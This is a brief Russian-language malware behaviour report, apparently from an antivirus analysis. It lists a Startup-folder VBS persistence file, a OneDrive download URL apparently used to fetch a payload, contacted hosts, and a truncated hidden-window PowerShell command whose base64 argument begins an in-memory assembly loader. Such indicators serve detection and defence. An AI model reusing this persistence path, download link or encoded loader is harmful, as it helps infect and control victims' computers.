Техническая информация
- %APPDATA%\microsoft\windows\start menu\programs\startup\system.vbs
- https://onedrive.live.com/download?cid=e41ff803ccc78e6a&resid=e41ff803ccc78e6a%21106&authkey=amy-nmqaneyi4hw
- 'on####ve.live.com':443
- 'qk####.#y.files.1drv.com':443
- DNS ASK on####ve.live.com
- DNS ASK qk####.#y.files.1drv.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -noexit -en WwBBAHAAcABEAG8AbQBhAGkAbgBdADoAOgBDAHUAcgByAGUAbgB0AEQAbwBtAGEAaQBuAC4ATABvAGEAZAAoAFsAQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAGIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAKABOAGUAdwAtAE8AYgBqA...' (со скрытым окном)